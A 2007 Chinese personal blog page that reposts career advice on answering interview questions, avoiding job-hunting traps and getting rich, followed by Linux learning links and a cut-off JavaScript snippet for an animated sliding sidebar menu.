面试技巧:16个经典面试问题回答思路
文章来源:
http://www.kaifulee.com/modules/bbs/viewthread.php?tid=78405问题一:“请你自我介绍一下”
思路:
1、这是面试的必考题目。
2、介绍内容要与个人简历相一致。
3、表述方式上尽量口语化。
4、要切中要害,不谈无关、无用的内容。
5、条理要清晰,层次要分明。
6、事先最好以文字的形式写好背熟。
问题二:“谈谈你的家庭情况”
思路:
1、 况对于了解应聘者的性格、观念、心态等有一定的作用,这是招聘单位问该问题的主要原因。
2、 简单地罗列家庭人口。
3、 宜强调温馨和睦的家庭氛围。
4、 宜强调父母对自己查看更多教育的内容教育的重视。
5、 宜强调各位家庭成员的良好状况。
6、 宜强调家庭成员对自己工作的支持。
7、 宜强调自己对家庭的责任感。
问题三:“你有什么业余爱好?”
思路:
1、 业余爱好能在一定程度上反映应聘者的性格、观念、心态,这是招聘单位问该问题的主要原因。
2、 最好不要说自己没有业余爱好。
3、 不要说自己有那些庸俗的、令人感觉不好的爱好。
4、 最好不要说自己仅限于读书、听音乐、上网,否则可能令面试官怀疑应聘者性格孤僻。
5、 最好能有一些户外的业余爱好来“点缀”你的形象。
问题四:“你最崇拜谁?”
思路:
1、 最崇拜的人能在一定程度上反映应聘者的性格、观念、心态,这是面试官问该问题的主要原因。
2、 不宜说自己谁都不崇拜。
3、 不宜说崇拜自己。
4、 不宜说崇拜一个虚幻的、或是不知名的人。
5、 不宜说崇拜一个明显具有负面形象的人。
6、 所崇拜的人人最好与自己所应聘的工作能“搭”上关系。
7、 最好说出自己所崇拜的人的哪些品质、哪些思想感染着自己、鼓舞着自己。
问题五:“你的座右铭是什么?”
思路:
1、座右铭能在一定程度上反映应聘者的性格、观念、心态,这是面试官问这个问题的主要原因。
2、不宜说那些医引起不好联想的座右铭。
3、不宜说那些太抽象的座右铭。
4、不宜说太长的座右铭。
5、座右铭最好能反映出自己某种优秀品质。
6、 参考答案——“只为成功找方法,不为失败找借口”
问题六:“谈谈你的缺点”
思路:
1、 不宜说自己没缺点。
2、 不宜把那些明显的优点说成缺点。
3、 不宜说出严重影响所应聘工作的缺点。
4、 不宜说出令人不放心、不舒服的缺点。
5、 可以说出一些对于所应聘工作“无关紧要”的缺点,甚至是一些表面上看是缺点,从工作的角度看却是优点的缺点。
问题七:“谈一谈你的一次失败经历”
思路:
1、 不宜说自己没有失败的经历。
2、 不宜把那些明显的成功说成是失败。
3、 不宜说出严重影响所应聘工作的失败经历,
4、 所谈经历的结果应是失败的。
5、 宜说明失败之前自己曾信心白倍、尽心尽力。
6、 说明仅仅是由于外在客观原因导致失败。
7、 失败后自己很快振作起来,以更加饱满的热情面对以后的工作。
问题八:“你为什么选择我们公司?”
思路:
1、 面试官试图从中了解你的动机、愿望以及对此项工作的态度。
2、 建议从行业、企业和岗位这三个角度来回答。
3、 参考答案——“我十分看好贵公司所在的行业,我认为贵公司十分重视人才,而且这项工作很适合我,相信自己一定能做好。”
问题九:“对这项工作,你有哪些可预见的困难?”
思路:
1、 不宜直接说出具体的困难,否则可能令对方怀疑应聘者不行。
2、 可以尝试迂回战术,说出应聘者对困难所持有的态度——“工作中出现一些困难是正常的,也是难免的,但是只要有坚忍不拔的毅力、良
好的合作精神以及事前周密而充分的准备,任何困难都是可以克服的。”
问题十:“如果我录用你,你将怎样开展工作”
思路:
1、 如果应聘者对于应聘的职位缺乏足够的了解,最好不要直接说出自己开展工作的具体办法,
2、 可以尝试采用迂回战术来回答,如“首先听取领导的指示和要求,然后就有关情况进行了解和熟悉,接下来制定一份近期的工作计划并报
领导批准,最后根据计划开展工作。”
问题十一:“与上级意见不一是,你将怎么办”
思路:
1、 一般可以这样回答“我会给上级以必要的解释和提醒,在这种情况下,我会服从上级的意见。”
2、 如果面试你的是总经理,而你所应聘的职位另有一位经理,且这位经理当时不在场,可以这样回答:“对于非原则性问题,我会服从上级
的意见,对于涉及公司利益的重大问题,我希望能向更高层领导反映。”
问题十二:“我们为什么要录用你?”
思路:
1、 应聘者最好站在招聘单位的角度来回答。
2、 招聘单位一般会录用这样的应聘者:基本符合条件、对这份共组感兴趣、有足够的信心。
3、 如“我符合贵公司的招聘条件,凭我目前掌握的技能、高度的责任感和良好的饿适应能力及学习能力 ,完全能胜任这份工作。我十分希望
能为贵 公司服务,如果贵公司给我这个机会,我一定能成为贵公司的栋梁!”
问题十三:“你能为我们做什么?”
思路:
1、 基本原则上“投其所好”。
2、 回答这个问题前应聘者最好能“先发制人”,了解招聘单位期待这个职位所能发挥的作用。
3、 应聘者可以根据自己的了解,结合自己在专业领域的优势来回答这个问题。
问题十四:“你是应届,缺乏经验,如何能胜任这项工作?”
思路: 1、 如果招聘单位对应届毕业生的应聘者提出这个问题,说明招聘单位并不真正在乎“经验”,关键看应聘者怎样回答。 2、 对这个
问题的回答最好要体现出应聘者的诚恳、机智、果敢及敬业。 3、 如“作为应届毕业生,在工作经验方面的确会有所欠缺,因此在读书期间我
一直利用各种机会在这个行业里做兼职。我也发现,实际工作远比书本知识丰富、复杂。但我有较强的责任心、适应能力和学习能力,而且比
较勤奋,所以在兼职中均能圆满完成各项工作,从中获取的经验也令我受益非浅。请贵公司放心,学校所学及兼职的工作经验使我一定能胜任
这个职位。”
问题十五:“你希望与什么样的上级共事?”
思路: 1、 通过应聘者对上级的“希望”可以判断出应聘者对自我要求的意识,这既上一个陷阱,又上一次机会。 2、 最好回避对上级具体
的希望,多谈对自己的要求。 3、 如“做为刚步入社会新人,我应该多要求自己尽快熟悉环境、适应环境,而不应该对环境提出什么要求,只
要能发挥我的专长就可以了。”
问题十六:“您在前一家公司的离职原因是什么?”
思路:
1、 最重要的是:应聘者要使找招聘单位相信,应聘者在过往的单位的“离职原因”在此家招聘单位里不存在。
2、 避免把“离职原因”说得太详细、太具体。
3、 不能掺杂主观的负面感受,如“太幸苦”、“人际关系复杂”、“管理太混乱”、“公司不重视人才”、“公司排斥我们某某的员工”等
。
4、 但也不能躲闪、回避,如“想换换环境”、“个人原因”等。
5、 不能涉及自己负面的人格特征,如不诚实、懒惰、缺乏责任感、不随和等。
6、 尽量使解释的理由为应聘者个人形象添彩。
7、 如“我离职是因为这家公司倒闭。我在公司工作了三年多,有较深的感情。从去年始,由于市场形势突变,公司的局面急转直下。到眼下
这一步我觉得很遗憾,但还要面对显示,重新寻找能发挥我能力的舞台。”
同一个面试问题并非只有一个答案,而同一个答案并不是在任何面试场合都有效,关键在于应聘者掌握了规律后,对面试的具体情况进行把握
,有意识地揣摩面试官提出问题的心理背景,然后投其所好。
posted @
2007-03-04 11:28 MEYE 阅读(1062) |
评论 (2) |
编辑 收藏
找工作的20条经验
文章来源:
http://www.kaifulee.com/modules/bbs/viewthread.php?tid=63933文/识字不疯狂
04年毕业,还没有单干的资本,我分析我自己也不适合单干,一直在打工,也倾向于一辈子打工。我工作快两年了,回顾一下自己的经历,写了点东西。大家也一起来说说经验吧,共同交流一下,互相促进,增长一点本领。
经验一:光鲜的招聘现场背后不一定代表一个正规友善、蓬勃向上的公司。比如2004年初我经历过一个大型**超市,它很快就倒闭了,招聘现场非常热闹,招聘手法非常有现代感——但是,两个月后,这家公司倒闭了。所以判断一个公司的实力,最好还是上网查一下、到公司问一下,像这个公司的供货商或者合作伙伴打听一下,绝人不能看招聘时的场面或者招聘人员的自我宣传。
经验二:招聘人员的高素质,不代表将来直接和你一起工作的人同样素质高;很多朋友都遇到过这样的问题,好不容易看到了一个知情达理的HR,谈得也很好。去工作了以后,才发现那个公司很乱套,除了那个HR以外的人员都非常差,甚至你会发现那个HR也很差。
经验三:经常招聘的公司,基本都不是好地方,多数还有圈套。广为人知的就是**证券、**建材、**保险,别看他们还是上市公司,骗起人来都是一套一套的。在国外店越大越得谨慎,但是目前国内越大的店越具有欺负人的潜质,还没人管,**建材就是典型。
经验四:招聘人员夸夸其谈的、使用煽动性语言的,多数都是陷阱。这样的有很多,一般都是几个穿着西装领带的人在招聘现场唾沫横飞,职位一般都是销售,许诺只要你能干,月薪3000、5000、10000,甚至100000都不在话下。比较出名的还有**保险的“保险,永不失业的朝阳产业”,靠,如果是永不失业的朝阳产业,你怎么还每周都到人才市场招人?
经验五:如果你不喜欢现在的专业,决心要通过考研究生改行,那么不必在考研究生之前找工作,考完后也会有工作的,尤其是春节以后。人的精力有限,集中兵力做好一件事情。反正你都想改行了,就不要想工作的事情。《圣经》中说,上帝要毁掉所多玛城的时候,透信给一个哥们,让那哥们赶紧走,就是不能回头,回头就变成盐柱了。结果那哥们,哎……
经验六:招聘的时候资方不谈给多少钱的,多数都是给的很少,不好意思说,先把你人忽悠去了再说。谈薪水这个东西是非常非常非常正常的,刚毕业的学生可能还有点扭转不过来,以为谈钱是多不好意思的事呀。被雇用不就是出卖自己么,卖自己之前怎么也得有个价码呀。绝口不谈薪水的公司,多半都是给的钱非常少;当然也有一些国际大公司,事先不谈薪水的,因为行业内的人都知道薪水肯定少不了。
经验七:交押金的、押毕业证原件的都是一些不爽的地方。能不去就不去。我遇见过要求抵押毕业证原件的,是一个台资企业,也遇见过要交押金的,是一个四川民企,说是公司有很多商业秘密,所以要押金。你把青春压上了,还要压毕业证或是现金,这样的地方是无论如何也不要理会的。
经验八:老总亲自去招聘的,基本都是很小的公司。中国的民企长不大,和老总的素质关系极大,当然了老总的素质低下也是全民整体素质低下的表现,不是说素质低的人才做老板。在招聘会现场,凡是那些一脸深沉、浑身霸气、看人的眼光挑三拣四、交谈的时候很没有礼貌、张口我的公司现在已经很大了、闭口你要是来我们公司还得试用半年……的老总,基本上都不要考虑去他们的公司了。
经验九:关于各种保险和住房公积金。第一不要相信企业的许诺,他说有,但是很多时候没有。第二,即使有,也可能很少很少。我的一个朋友每个月的工资在3K左右,公司给缴了3年多的医疗保险,但是一场感冒医保卡里面的钱就全都没有了,因为那个公司是按照月工资300元给缴的保险——他的工资的确是三百元,剩下的都是奖金。
经验十:绝大多数公司定下的面试时间都不准确。从招聘约会的时间上看,目前我们国家的绝大多数企业实在还是停留在很低级的管理水平上,按照约定好的时间到了,还要等上一个小时两个小时,在招聘的人眼里看来那都是很正常的。中国人的时间观念差,可见一斑。有些大企业要好一些,很守时。甚至告诉你8:55到什么地方,9:00到什么地方,有专人接送。如果有公司迟到什么,不要太生气,都那味,不守时的公司不见得是很差的公司。
经验十一:女孩子要注意的。有一些公司是来招儿媳妇的、招小姐的,这是比较明显的骗局。还有一些公司需要大量的文员,他就不断地招聘女生以很低的薪水去做那些基础性的工作,试用期一过就说你不合格。另外企业人员素质非常差比如说什么司机保安都能甚嚣尘上的公司,或者男女关系很复杂的公司,也都不要去。
经验十二:广结善缘、不去那里工作,也不要弄出点仇来。踏入社会后每接触的一个人或者一个公司,都可能与你未来生活产生关联。如果你不想被他雇用,也不要和他结下梁子,无论他可能多么没礼貌、或者他开除的薪水是多么没有礼貌。和颜悦色的表达你的拒绝的意思就行了。我仍举上面说过的那个四川的网络公司,他们对有1年经验的员工给出的待遇是,试用期500、转正700,试用期三个月,无论试用转正都没有合同,头两个月要扣除300元押金(第一个月扣200也就是开300,第二个月扣100也就是开400),除此以外没有任何形式的补助、奖金、保险、公积金,每周休息一天。但是随时加班,没有加班费。加班到晚上没有公交车的时候,也不给报打车费,公司内有大通铺,爱睡不睡。
这个公司把我激怒了。因为我在填写薪酬待遇的时候添了2k,而且特意在人才市场现场询问了招聘者,能不能达到这个数字。那个招聘的女士很礼貌的说,你下午来吧,这是地址条。我下午推了很重要的事情去的,并且那个公司的面试迟到了少一个小时,结果那个给我递条的人,也就是人力资源主任,在她的办公室同样优雅的说着上面的待遇的时候,我彻底被激怒了,不待脏字的把她骂了,为了我付出的那些时间。
但是,事后反省,我觉得没有必要骂人。因为那不能是我自己的境遇有所改善。在那以后无论碰上多么差劲的招聘者,我都没有发脾气。我可以选择不被他雇用,但是可能以后这个公司就是我的客户,何必呢。
经验十三:小心“后备主管”“储备经理”等。这些职位一般都是招男生,招进去了以后什么活都干,什么苦都吃。因为你是“后备”“储备”呀,所以什么活都让你干。这种把戏多见于那些季节性的行业,比如夏天的酒店和旅行社。
经验十四:永远不要相信承诺,也不要相信合同。这是目前我国的国情。空口固然无凭,盖上了红章章的黑纸白字一样也是废纸。对于一个公司对待员工的状况,口碑这个东东要比承诺、合同都更稍微可信一点。
经验十五:关于劳动合同。多研究一下《劳动法》《合同法》吧,签合同之前要把一些问题搞清楚。很多时候,签还是不签,那是一个问题呀!这个问题比较复杂,我说不太清楚。因为种种种种的原因,我从来就没跟雇主签过合同,虽然我希望做一个守法公民。
经验十六:在选择被谁雇佣之前,仔细计算一下投入产出比例——薪水不是唯一应该被考虑的元素,甚至连重要因素都不是。比如说一个人挣5k,另外一个人挣2k,表面看来收入5k的要比收入2k的收入高很多。但是如果这个挣5k的每天10小时严重超负荷工作,每两周只有一天休息,而且他从事的工作比较封闭,拓展的空间比较小,接触的人也非常少;那个收入2k的每周工作5天,一天8小时,公司有各种培训,工作很开放,拓展的空间也很大。那么我想这两个人五年以后的健康状况、做人境界、收入境界的差别都会非常大的。
经验十七:穿着打扮。面试的时候算是一个比较正式的场合了,所以就要打扮得有那么一点职业气息,绝大多数的公司都需要规矩人。所以如果应聘的不是很需要创造力的职位的话,还是在头几次打扮得乖巧一点,以后模着到了,再怎么舒服怎么穿。女孩子面试的时候,不必特意打扮的,又是做头发、又是买衣服的,不是很有必要。如果一个公司因为你打扮得妖艳看上了你,那才是需要担忧的事情。更有甚者,我听说过有很多人在大学四年级的时候整容,呵呵,那种自我摧残就不要了。一个员工的价值,不在于它是单眼皮合适的双眼皮,在于她眼睛的洞察力。
经验十八:要不要美丽的撒谎。有一些谎言,还是要有的,那种善意的。比如人问你打算在北京定居么,你总不能实话实说这个鬼地方风沙大停车贵总堵车我干两年就回九寨沟老家。
经验十九:刚刚毕业尽量进大公司。应届毕业生,对于公司的选择更要慎重,哈佛的几个心理学家研究过人的第一份工作和一生发展轨迹的关系,得出的结论是人的第一个工作的对一个人的影响比我们想象的还要大,因为那奠定了一个人很多的思考习惯,行为习惯。在高效率的公司干过,到了低效率的公司也能适应。不过要是在一个小公司养成了一身坏毛病,以后的发展就很受限制。大公司之所以能成为大公司,肯定是有过人之处的。进一个好公司相当于上一个好大学,不知不觉中就出息了。
经验二十:招聘人缺少教养的,不管工资给到多高,也不要去。一个公司让缺少礼貌的人去负责招聘,这个公司根本就不值得期待。
其实,把这些都写完以后,我心里也知道,几乎没有公司能够完全按照法律条文上说的那样用工,尤其是对待像大学本科生这样的低级劳动力。既然大学本科生就是过剩劳动力(无论你多牛,从经验这个角度上,你都是过剩的,官方公布的9%的失业率就意味着你将近一成的师兄师姐还没工作呢),所以你必然要碰上一些情况,碰上以后比较合理的选择就是忍气吞声,知道要计较什么不要计较什么。
posted @
2007-03-04 11:22 MEYE 阅读(353) |
评论 (0) |
编辑 收藏
成为有钱人的25种方法
文章来源: http://www.kaifulee.com/modules/bbs/viewthread.php?tid=14777 “嫁个有钱人”不如自己成为有钱人,你知道如何成为有钱人吗? 1、做你真正感兴趣的事——你会花很多时间在上面,因此你一定要感兴趣才行,如果不是这样的话,你不愿意把时间花在上面,就得不到成功。 2、自己当老板。为别人打工,你绝不会变成巨富,老板一心一意地缩减开支,他的目标不是使他的职员变成有钱人。 3、提供一种有实效的服务,或一种实际的产品。你要以写作、绘画或作曲变成百万富翁的机会可以说是无限小,而你要在营造业、房地产、制造业发大财的机会比较大。记住,出版商赚的钱比作家多得多。 4、你坚持要用自己的灵感来创业?最好选择娱乐业,在这方面,发财的速度相当快,流行歌曲和电视最理想。 5、不论你是演员或商人,尽量增加你的观众。在小咖啡馆唱歌的人,所赚的钱一定比不上替大唱片公司灌唱片的人,地方性的商人,不会比全国性的商人赚的钱多。 6、找出一种需要,然后满足它。社会越变越复杂,人们所需要的产品和服务越来越多,最先发现这些需求而且满足他们的人,是改进现有产品和服务的人,也是最先成为富翁的人。 7、不要不敢采用不同的方式——新的方法和新产品,会造成新的财富。但必须确定你的新方法比旧方法更理想,你的新方法必须增进产品外观、效率、品质、方便或者降低成本。 8、如果你受过专业教育,或者有特殊才能,充分利用它。如果你烧得一手好菜,而却要去当泥水匠,那就太笨了。 9、在你着手任何事情之前,仔细地对周围的情形研究一番。政府机关和公共图书馆,可以提供不少资料,先做研究,可以节省你不少时间和金钱。 10、不要一直都想着发大财,不如你想想如何改进你的事业,您应该常常问自己的是:“我如何改良我的事业?”如何使事业进行顺利,财富就会跟着而来。 11、可能的话,进行一种家庭事业,这种方法可以减少费用,增进士气,利润的分配很简单,利润能够得到充分的利用,整个事业控制也较容易。 12、尽可能减少你的费用,但不能牺牲你的品质,否则的话,你等于是在慢性自杀,赚钱的机会不会大。 13、跟同行的朋友维持友谊——他们可能对你很有帮助。 14、把尽量多的时间花在事业上。一天12小时、一星期6天是最低要求,一天14小时到18小时很平常,一星期工作7天最好了。你必须先牺牲家庭和社会上的娱乐,直到你事业站稳为止。也只有到那时候,你才能把责任分给别人。 15、不要不敢自己下决心。听听别人的赞美和批评,但你自己要下决心。 16、不要不敢说实话。拐弯抹角,只会浪费时间,心里想什么就说什么,而且要尽可能地直截了当地、明确地说出来。 17、不要不敢承认自己的错误。犯了错误并不是一种罪行,犯错不改才是罪过。 18、不要因为失败就裹足不前。失败是难免的,也是有价值的,从失败中,你会学到正确的方法论。 19、不要在不可行的观念上打转。一发现某种方法行不通,立即把它放弃。世界上有无数的方法,把时间浪费在那些不可行的方法上是无可弥补的损失。 20、不要冒你承担不起的风险。如果你损失10万元,若损失得起的话,就可以继续下去,但如果你赔不起5万元,而一旦失败的话,你就完蛋了。 21、一再投资,不要让你的利润空闲着,你的利润要继续投资下去,最好投资别的事业或你控制的事业上,那样,才能钱滚钱,替你增加好几倍的财富。 22、请一位高明的律师——他会替你节约更多的金钱和时间,比起你所给予的将要多的多。 23、请一位精明的会计师。最初的时候,你自己记账,但除非你本身是个会计师,你还是请一位精明的会计师,可能决定你的成功和失败——他是值得你花钱的。 24、请专家替你报税。一位机灵的税务专家,可又替你免很多的税。 25、好好维持你的健康和你的平静心灵——否则的话,拥有再多的钱也没有什么意思。
|
posted @
2007-03-04 11:19 MEYE 阅读(365) |
评论 (0) |
编辑 收藏
Linux 学习:
http://www.openfans.net/main.html
http://www.uplooking.com/
http://blog.csdn.net/yuanmeng001/archive/2007/01/24/1491939.aspx
开源盛世 http://blog.chinaunix.net/u/4536/
http://blog.chinaunix.net/u/12857/
一段JAVAScript代码:
<style type="text/css">
<!--
body,td,th {
font-size: 12px;
}
a:link {
color: #0000FF;
}
a:visited {
color: #0000FF;
}
a:hover {
color: #CC0000;
}
a:active {
color: #0000FF;
}
-->
</style>
<title>mozhongxia 的名片</title>
<body style="overflow:scroll;overflow-x:hidden;">
<DIV id=overDiv style="POSITION: absolute; Z-INDEX: 1"></DIV>
<script src="overlib.js"></script>
<script>
<!--
document.write("<style>#vwork_master{LEFT:0px; POSITION:absolute;}#vwork_menu{LEFT:130px;POSITION:absolute; TOP:30px; Z-INDEX:5}#vwork_screen{POSITION:absolute; TOP:10px; Z-INDEX:5}#vwork_screenlinks{POSITION:absolute; TOP:-5px; VISIBILITY:visible; Z-INDEX:5}</style>")
document.write('<style>#vwork_screen{filter:Alpha(Opacity=60)</style>')
var vwork_master = new Object("element")
vwork_master.curLeft = 0;
vwork_master.curTop = 10;
function moveAlong(layerName, paceLeft, paceTop, fromLeft, fromTop){
clearTimeout(eval(layerName).timer)
if(eval(layerName).curLeft != fromLeft){
if((Math.max(eval(layerName).curLeft, fromLeft) - Math.min(eval(layerName).curLeft, fromLeft)) < paceLeft){eval(layerName).curLeft = fromLeft}
else if(eval(layerName).curLeft < fromLeft){eval(layerName).curLeft = eval(layerName).curLeft + paceLeft}
else if(eval(layerName).curLeft > fromLeft){eval(layerName).curLeft = eval(layerName).curLeft - paceLeft}
document.all[layerName].style.left = eval(layerName).curLeft
}
if(eval(layerName).curTop != fromTop){
if((Math.max(eval(layerName).curTop, fromTop) - Math.min(eval(layerName).curTop, fromTop)) < paceTop){eval(layerName).curTop = fromTop}
else if(eval(layerName).curTop < fromTop){eval(layerName).curTop = eval(layerName).curTop + paceTop}
else if(eval(layerName).curTop > fromTop){eval(layerName).curTop = eval(layerName).curTop - paceTop}
document.all[layerName].style.top = eval(layerName).curTop
}
eval(layerName).timer=setTimeout('moveAlong("'+layerName+'",'+paceLeft+','+paceTop+','+fromLeft+','+fromTop+')',30)
}
function setPace(layerName, fromLeft, fromTop, motionSpeed){
eval(layerName).gapLeft = (Math.max(eval(layerName).curLeft, fromLeft) - Math.min(eval(layerName).curLeft, fromLeft))/motionSpeed
eval(layerName).gapTop = (Math.max(eval(layerName).curTop, fromTop) - Math.min(eval(layerName).curTop, fromTop))/motionSpeed
moveAlong(layerName, eval(layerName).gapLeft, eval(layerName).gapTop, fromLeft, fromTop)
}
var expandState = 0
var clickNum = 0
function expand(){
if (clickNum==0){
clickNum=1
if(expandState == 0){setPace("vwork_master", -131, 10, 10);
document.menutop.src="../images/an.gif"; expandState = 1;}//end if
else{
setPace("vwork_master", 0, 10, 10);
document.menutop.src="../images/an.gif"; expandState = 0;}//end if
setTimeout("expandend()", 100);
}
}//end function
function expandend(){
clickNum=0;
}
document.write ('<div id="vwork_master">');
document.write (' <div id="vwork_menu" onmouseover="expand()" style="cursor:hand;">');
document.write (' <table border="0" cellpadding="0" cellspacing="0" width="35">');
document.write (' <tbody>');
document.write (' <tr>');
document.write (' <td width="100%"><img src="../images/an.gif" alt="点击此处隐藏或展开客服中心" name="menutop" id="menutop" /></td>');
document.write (' </tr>');
document.write (' </tbody>');
document.write (' </table>');
document.write (' </div>');
document.write (' <div id="vwork_screenlinks" >');
document.write (' <table width="132" border="0" cellpadding="0" cellspacing="0">');
document.write (' <tr>');
document.write (' <td width="15" background="images/bg_1.gif"> </td>');
document.write (' <td width="112" align="center" valign="top"><table width="100%" border="0" cellspacing="0" cellpadding="0">');
document.write (' <tr>');
document.write (' <td> </td>');
document.write (' </tr>');
document.write (' </table>');
document.write ('<table width="100%" border="0" cellspacing="0" cellpadding="0">');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao7.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="http://www.whwise.com/zhima/N_user/BigUserReg.asp?mid=4527"><FONT color=#777777>注册名片</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao2.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="/zhima/N_Adv/index.asp?mid=4527" target=_blank><FONT color=#777777>我的广告</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao3.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="/zhima/N_Shop/index.asp?mid=4527" target=_blank><FONT color=#777777>我的商城</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao4.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="/zhima/N_Blog/index.asp?mid=4527"><FONT color=#777777>我的博客</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao5.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="/zhima/N_User/MyCollection.asp?user=mozhongxia"><FONT color=#777777>我的收藏</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao1.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="/zhima/companyinfo.asp?user=mozhongxia" target=_blank><FONT color=#777777>我的简介</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao6.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="/zhima/msg.asp?user=mozhongxia"><FONT color=#777777>给我留言</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao8.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="http://www.whwise.com/zhima/N_user/login.asp?mid=4527"><FONT color=#777777>管理名片</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <TABLE height=74 cellSpacing=0 cellPadding=0 width=70 border=0><TBODY><TR><TD vAlign=top align=middle background=images/biao9.gif><TABLE cellSpacing=0 cellPadding=0 width="90%" border=0><TBODY><TR><TD height=50> </TD></TR><TR><TD align=middle height=15><P align=left><SPAN class=STYLE1> <A href="../goUnion.asp?user=mozhongxia"><FONT color=#777777>名片排行</FONT></A></SPAN></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center"> ');
document.write (' <br>人气:<font color="#FF0000">19</font>');
document.write (' </td>');
document.write (' </tr>');
document.write (' <tr>');
document.write (' <td align="center" onMouseOver="drs(\'如果您是本站付费用户可以获得从您名片注册付费会员服务费15%的推广奖励,并可以获得该注册用户在本站会员商城消费奖励的10%提成奖励;若您是免费用户,可以即刻升级为正式会员,以获取奖励的资格。\'); return true;" onMouseOut="nd(); return true;">');
document.write (' <br> 已经有 <font color=#ff0000>0</font> 位用户从您的名片注册');
document.write (' </td>');
document.write (' </tr>');
document.write ('</table>');
document.write (' </td>');
document.write (' <td valign="Top" background="images/tiao.gif" width="4" height="800" id="menu_left"></td>');
document.write (' </tr>');
document.write (' </table>');
document.write (' </div>');
document.write ('</div>');
var sidemenu = document.all.vwork_master;
sidemenu.style.top = document.body.scrollTop+2
function yuzi(){
}
setInterval("yuzi()",100);
expand();
-->
</script>
<script>
<!--
vwork_master_r_width=document.body.clientWidth-138
document.write("<style>#vwork_master_r{LEFT:" + vwork_master_r_width + "px;POSITION:absolute;}#vwork_menu_r{LEFT:-20px;POSITION:absolute; TOP:30px; Z-INDEX:5}#vwork_screen_r{POSITION:absolute; TOP:10px; Z-INDEX:5}#vwork_screenlinks_r{POSITION:absolute; TOP:-5px; VISIBILITY:visible; Z-INDEX:5}</style>")
document.write('<style>#vwork_screen_r{filter:Alpha(Opacity=60)</style>')
var vwork_master_r = new Object("element")
vwork_master_r.curLeft = vwork_master_r_width;
vwork_master_r.curTop = 10;
function moveAlong_r(layerName, paceLeft, paceTop, fromLeft, fromTop){
clearTimeout(eval(layerName).timer)
if(eval(layerName).curLeft != fromLeft){
if((Math.max(eval(layerName).curLeft, fromLeft) - Math.min(eval(layerName).curLeft, fromLeft)) < paceLeft){eval(layerName).curLeft = fromLeft}
else if(eval(layerName).curLeft < fromLeft){eval(layerName).curLeft = eval(layerName).curLeft + paceLeft}
else if(eval(layerName).curLeft > fromLeft){eval(layerName).curLeft = eval(layerName).curLeft - paceLeft}
document.all[layerName].style.left = eval(layerName).curLeft
}
if(eval(layerName).curTop != fromTop){
if((Math.max(eval(layerName).curTop, fromTop) - Math.min(eval(layerName).curTop, fromTop)) < paceTop){eval(layerName).curTop = fromTop}
else if(eval(layerName).curTop < fromTop){eval(layerName).curTop = eval(layerName).curTop + paceTop}
else if(eval(layerName).curTop > fromTop){eval(layerName).curTop = eval(layerName).curTop - paceTop}
